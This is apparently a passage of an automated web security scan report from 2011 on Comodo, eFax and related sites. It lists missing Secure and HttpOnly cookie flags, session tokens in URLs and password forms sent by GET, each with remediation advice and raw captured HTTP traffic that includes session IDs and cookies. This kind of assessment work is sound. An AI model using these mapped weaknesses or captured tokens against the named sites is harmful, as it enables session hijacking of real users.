HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:23:21 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=c437c7a28b71ec890cf440a1d883; Path=/PCICS
Connection: close
Content-Length: 590


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html
...[SNIP]...

3.6. https://www.panopticsecurity.com/PCICS/MerController/doMetaQuestion  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.panopticsecurity.com
Path:   /PCICS/MerController/doMetaQuestion

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /PCICS/MerController/doMetaQuestion HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/MerController/doMetaQuestions
Content-Length: 203
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TemporaryTestCookie=yes; JSESSIONID=c4b181d68f939faf4b586b274a3e

partner=Comodo&theAnswer+to+Do+you+have+a+POS+terminal%2C+or+other+Payment+Application%2C+andourForwardSlashMarkeror+an+Imprint+Machine+%28ourDoubleQuoteMarkerknuckle-busterourDoubleQuoteMarker%29%3F=
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:31:49 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=c4b411f07d6c067b98ce9194a5ae; Path=/PCICS
Connection: close
Content-Length: 3992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...

3.7. https://www.panopticsecurity.com/PCICS/PanController/doInitUser  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.panopticsecurity.com
Path:   /PCICS/PanController/doInitUser

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PCICS/PanController/doInitUser?partner=Comodo&path=Enter+ExpertPCI HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TemporaryTestCookie=yes; JSESSIONID=c483ef1a943db8e1f27035ee8e5c

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 18 Sep 2011 11:28:59 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: Servlet/3.0 JSP/2.2 (GlassFish Server Open Source Edition 3.1 Java/Sun Microsystems Inc./1.6)
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 17:00:00 MST
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Location: http://www.panopticsecurity.com/PCICS/MerController/doStart?partner=Comodo
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 224
Set-Cookie: JSESSIONID=c48a63af3a1fe42b1ac75b96be64; Path=/PCICS
Connection: close

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://www.panopticsecurity.com/PCICS/MerController/doStart?partner=Comodo">here</a>
...[SNIP]...

4. Session token in URL  previous  next
There are 7 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


4.1. http://efaxcorporate.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://efaxcorporate.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /?utm_source=j2&utm_medium=cross+sell&utm_campaign=enterprise+page HTTP/1.1
Host: efaxcorporate.com
Proxy-Connection: keep-alive
Referer: http://home.j2.com/enterprise/enterprise.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:20 GMT
Server: Apache
Vary: Host,Accept-Encoding
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=37657A97FCC62C80A944C9835E8E0575.efaxcorp1b; Path=/efaxcorp-cms-public
Set-Cookie: brand=efaxcorp; Domain=.efaxcorporate.com; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:19:20 GMT
Content-Length: 56030
X-TWA-Web: pa:28012
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<!-- BEGIN HumanTag Monitor and LiveEngage. DO NOT MOVE! MUST BE PLACED JUST BEFORE THE /BODY TAG -->
<script language="javascript" src="https://server.iad.liveperson.net/hc/62672927/x.js?SESSIONVAR!origin=efaxCorporatesales&cmd=file&file=chatScript3&site=62672927&imageUrl=https://a248.e.akamai.net/7/248/528/001/images.j2.com/chatEfaxCorp/">//</script>
...[SNIP]...

4.2. http://efaxcorporate.com/solutions/Compatibility/Industry-Compatibility  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://efaxcorporate.com
Path:   /solutions/Compatibility/Industry-Compatibility

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /solutions/Compatibility/Industry-Compatibility HTTP/1.1
Host: efaxcorporate.com
Proxy-Connection: keep-alive
Referer: http://efaxcorporate.com/?utm_source=j2&utm_medium=cross+sell&utm_campaign=enterprise+page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKAINFO="client=eozbczabczaof//areacode=408//city=SANJOSE//state=CA//country=US//region=NA//bandwidth=vhigh//timezone=PST//version=3"; brand=efaxcorp; __g_c=w%3A1%7Cb%3A2; mbox=check#true#1316366487|session#1316366426074-552683#1316368287; s_cc=true; s_ev4=%5B%5B%27home.j2.com%27%2C%271316366426332%27%5D%5D; s_ev5=%5B%5B%27Referrers%27%2C%271316366426333%27%5D%5D; j2CampaignTracking=; __utma=110028753.680056721.1316366426.1316366426.1316366426.1; __utmb=110028753.1.10.1316366426; __utmc=110028753; __utmz=110028753.1316366426.1.1.utmcsr=j2|utmccn=enterprise%20page|utmcmd=cross%20sell; c_m=undefinedhome.j2.comhome.j2.com; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:43 GMT
Server: Apache
Vary: Host,Accept-Encoding
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=96D358893B7F3897A12EA3F682AD7C0A.efaxcorp1a; Path=/efaxcorp-cms-public
Set-Cookie: brand=efaxcorp; Domain=.efaxcorporate.com; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:19:43 GMT
Content-Length: 39406
X-TWA-Web: pa:28012
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http
...[SNIP]...
<!-- BEGIN HumanTag Monitor and LiveEngage. DO NOT MOVE! MUST BE PLACED JUST BEFORE THE /BODY TAG -->
<script language="javascript" src="https://server.iad.liveperson.net/hc/62672927/x.js?SESSIONVAR!origin=efaxCorporatesales&cmd=file&file=chatScript3&site=62672927&imageUrl=https://a248.e.akamai.net/7/248/528/001/images.j2.com/chatEfaxCorp/">//</script>
...[SNIP]...

4.3. http://j2global.tt.omtrdc.net/m2/j2global/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://j2global.tt.omtrdc.net
Path:   /m2/j2global/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/j2global/mbox/standard?mboxHost=www.trustfax.com&mboxSession=1316364084200-226831&mboxPage=1316364084200-226831&screenHeight=1200&screenWidth=1920&browserWidth=1097&browserHeight=869&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=TF_xs_adClick_globalfooter&mboxId=0&mboxTime=1316346084298&mboxURL=http%3A%2F%2Fwww.trustfax.com%2F&mboxReferrer=http%3A%2F%2Fwww.vengine.com%2Fproducts%2Fprove_it.html&mboxVersion=39 HTTP/1.1
Host: j2global.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.trustfax.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 181
Date: Sun, 18 Sep 2011 11:40:19 GMT
Server: Test & Target

mboxFactories.get('default').get('TF_xs_adClick_globalfooter',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1316364084200-226831.19");

4.4. https://secure.comodo.com/ev/faq.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.comodo.com
Path:   /ev/faq.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /ev/faq.html HTTP/1.1
Host: secure.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:31:04 GMT
Content-Type: text/html
Content-Length: 14655
Last-Modified: Wed, 03 Feb 2010 20:10:06 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
<li><a id="_lpChatBtn" href='http://server.iad.liveperson.net/hc/61298727/?cmd=file&file=visitorWantsToChat&site=61298727&byhref=1&SESSIONVAR!skill=Sales&imageUrl=http://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a' target='chat61298727' onClick="javascript:window.open('http://server.iad.liveperson.net/hc/61298727/?cmd=file&file=visitorWantsToChat&site=61298727&SESSIONVAR!skill=Sales&imageUrl=http://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a&referrer='+escape(document.location),'chat61298727','width=475,height=400,resizable=yes');return false;">Chat with an EV SSL Specialist Now</a>
...[SNIP]...

4.5. https://secure.comodo.com/geekbuddy/create-account.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.comodo.com
Path:   /geekbuddy/create-account.php

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /geekbuddy/create-account.php HTTP/1.1
Host: secure.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:31:06 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 33647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<td colspan="2" class="terms_cond">Need help with Billing or with Registration? ... <a rel="nofollow" href="http://server.iad.liveperson.net/hc/61298727/?cmd=file&amp;file=visitorWantsToChat&amp;site=61298727&amp;byhref=1&amp;SESSIONVAR!skill=CFP%20PRO%20PLUS&amp;imageUrl=https://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a" onclick="javascript:pageTracker._trackPageview('/outbound/order-index/form/text/server.iad.liveperson.net'); javascript:window.open('http://server.iad.liveperson.net/hc/61298727/?cmd=file&amp;file=visitorWantsToChat&amp;site=61298727&amp;byhref=1&amp;SESSIONVAR!skill=CFP%20PRO%20PLUS&amp;imageUrl=https://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a','chat','width=475,height=400,resizable=yes');return false;" class="blue_link">Chat Now</a>
...[SNIP]...
<span><a rel="nofollow" href="http://server.iad.liveperson.net/hc/61298727/?cmd=file&amp;file=visitorWantsToChat&amp;site=61298727&amp;byhref=1&amp;SESSIONVAR!skill=CFP%20PRO%20PLUS&amp;imageUrl=https://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a" onclick="javascript:pageTracker._trackPageview('/outbound/order-index/footer/text/server.iad.liveperson.net'); javascript:window.open('http://server.iad.liveperson.net/hc/61298727/?cmd=file&amp;file=visitorWantsToChat&amp;site=61298727&amp;byhref=1&amp;SESSIONVAR!skill=CFP%20PRO%20PLUS&amp;imageUrl=https://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a','chat','width=475,height=400,resizable=yes');return false;" title="Member Chat">Member Chat</a>
...[SNIP]...

4.6. http://server.iad.liveperson.net/hc/61298727/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://server.iad.liveperson.net
Path:   /hc/61298727/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hc/61298727/?visitor=&msessionkey=&site=61298727&cmd=startPage&page=http%3A//www.instantssl.com/&visitorStatus=INSITE_STATUS&activePlugin=none&pageWindowName=&javaSupport=true&id=125749232&scriptVersion=1.1&d=1316328667529&&SESSIONVAR!skill=Sales&scriptType=SERVERBASED&title=SSL%20Certificate%20From%20Comodo%u2122%20with%20Free%20SSL%20Certificates%20and%20Server%20Certificates%20%u2013%20Digital%20Certificate%20Authority&referrer=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dcomodo HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.instantssl.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5094376206423575644; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1316310598891

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 01:50:04 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_61298727=STANDALONE; path=/hc/61298727
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 34

GIF89aP............,...........L.;

4.7. http://www.enterprisessl.com/ssl-certificate-products/evssl/ssl-certificate-search.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.enterprisessl.com
Path:   /ssl-certificate-products/evssl/ssl-certificate-search.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /ssl-certificate-products/evssl/ssl-certificate-search.html HTTP/1.1
Host: www.enterprisessl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:11:47 GMT
Content-Type: text/html
Content-Length: 18664
Last-Modified: Wed, 20 Oct 2010 18:25:04 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<title>Business En
...[SNIP]...
<li><a href="http://icrs.informe.org/nei-sos-icrs/ICRS;jsessionid=B2AC095946D5DEAD874571E37C7C8D3B?MainPage=x" onclick="return popitup('http://icrs.informe.org/nei-sos-icrs/ICRS;jsessionid=B2AC095946D5DEAD874571E37C7C8D3B?MainPage=x')">Maine Corporation Search</a>
...[SNIP]...

5. Password field submitted using GET method  previous  next
There are 2 instances of this issue:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.


5.1. http://www.contentverification.com/confidence_pak-buy.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.contentverification.com
Path:   /confidence_pak-buy.html

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /confidence_pak-buy.html HTTP/1.1
Host: www.contentverification.com
Proxy-Connection: keep-alive
Referer: http://www.contentverification.com/confidence_pak.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=14506661.917737140.1316364115.1316364115.1316364115.1; __utmc=14506661; __utmz=14506661.1316364115.1.1.utmccn=(referral)|utmcsr=vengine.com|utmcct=/products/prove_it.html|utmcmd=referral; __utmb=14506661

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:00:00 GMT
Content-Type: text/html
Last-Modified: Tue, 12 Oct 2010 00:45:21 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 7751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Conte
...[SNIP]...
</ul>
<form name="formN" method="GET" action="https://secure.comodo.com/products/!placeOrder" onSubmit="return valid()">
<input type="hidden" name="currency" />
...[SNIP]...
</strong>
<input type="password" name="loginPassword" value="" /></p>
...[SNIP]...

5.2. http://www.contentverification.com/logos/index.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.contentverification.com
Path:   /logos/index.html

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /logos/index.html HTTP/1.1
Host: www.contentverification.com
Proxy-Connection: keep-alive
Referer: http://www.contentverification.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=14506661.917737140.1316364115.1316364115.1316364115.1; __utmc=14506661; __utmz=14506661.1316364115.1.1.utmccn=(referral)|utmcsr=vengine.com|utmcct=/products/prove_it.html|utmcmd=referral; __utmb=14506661

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:59:04 GMT
Content-Type: text/html
Last-Modified: Tue, 12 Oct 2010 00:45:20 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 26684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Spoof
...[SNIP]...
</h1>
<form name="logo" method="GET" action="https://secure.comodo.com/products/!placeOrder" onSubmit="return valid()">
<input type="hidden" name="ap" value="contentverification.com" />
...[SNIP]...
<td><input type="password" name="loginPassword" value="" /></td>
...[SNIP]...

6. Cookie without HttpOnly flag set  previous  next
There are 15 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



6.1. http://efaxcorporate.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://efaxcorporate.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?utm_source=j2&utm_medium=cross+sell&utm_campaign=enterprise+page HTTP/1.1
Host: efaxcorporate.com
Proxy-Connection: keep-alive
Referer: http://home.j2.com/enterprise/enterprise.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:20 GMT
Server: Apache
Vary: Host,Accept-Encoding
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=37657A97FCC62C80A944C9835E8E0575.efaxcorp1b; Path=/efaxcorp-cms-public
Set-Cookie: brand=efaxcorp; Domain=.efaxcorporate.com; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:19:20 GMT
Content-Length: 56030
X-TWA-Web: pa:28012
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...

6.2. http://efaxcorporate.com/solutions/Compatibility/Industry-Compatibility  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://efaxcorporate.com
Path:   /solutions/Compatibility/Industry-Compatibility

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /solutions/Compatibility/Industry-Compatibility HTTP/1.1
Host: efaxcorporate.com
Proxy-Connection: keep-alive
Referer: http://efaxcorporate.com/?utm_source=j2&utm_medium=cross+sell&utm_campaign=enterprise+page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKAINFO="client=eozbczabczaof//areacode=408//city=SANJOSE//state=CA//country=US//region=NA//bandwidth=vhigh//timezone=PST//version=3"; brand=efaxcorp; __g_c=w%3A1%7Cb%3A2; mbox=check#true#1316366487|session#1316366426074-552683#1316368287; s_cc=true; s_ev4=%5B%5B%27home.j2.com%27%2C%271316366426332%27%5D%5D; s_ev5=%5B%5B%27Referrers%27%2C%271316366426333%27%5D%5D; j2CampaignTracking=; __utma=110028753.680056721.1316366426.1316366426.1316366426.1; __utmb=110028753.1.10.1316366426; __utmc=110028753; __utmz=110028753.1316366426.1.1.utmcsr=j2|utmccn=enterprise%20page|utmcmd=cross%20sell; c_m=undefinedhome.j2.comhome.j2.com; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:43 GMT
Server: Apache
Vary: Host,Accept-Encoding
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=96D358893B7F3897A12EA3F682AD7C0A.efaxcorp1a; Path=/efaxcorp-cms-public
Set-Cookie: brand=efaxcorp; Domain=.efaxcorporate.com; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:19:43 GMT
Content-Length: 39406
X-TWA-Web: pa:28012
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http
...[SNIP]...

6.3. http://efaxdeveloper.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://efaxdeveloper.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?utm_source=j2&utm_medium=cross+sell&utm_campaign=enterprise+page HTTP/1.1
Host: efaxdeveloper.com
Proxy-Connection: keep-alive
Referer: http://home.j2.com/enterprise/enterprise.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:24 GMT
Server: Apache
Vary: Host,Accept-Encoding
Cache-Control: max-age=43200, public
Pragma:
Content-Length: 16094
Expires: Mon, 19 Sep 2011 00:19:24 GMT
Last-Modified: Sun, 18 Sep 2011 10:26:52 GMT
X-Magnolia-Registration: Registered
Set-Cookie: CMS_JSESSIONID=V5c6T1hMnXsnxsT6n2c2DJTWHR5SLJG8fngF7dvLv0h2TyrWDBlv!-1356397028; path=/
Set-Cookie: lang=en; domain=efaxdeveloper.com; expires=Wednesday, 02-Nov-2011 12:19:24 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
X-TWA-Web: pb:28032
Content-Type: text/html;charset=UTF-8


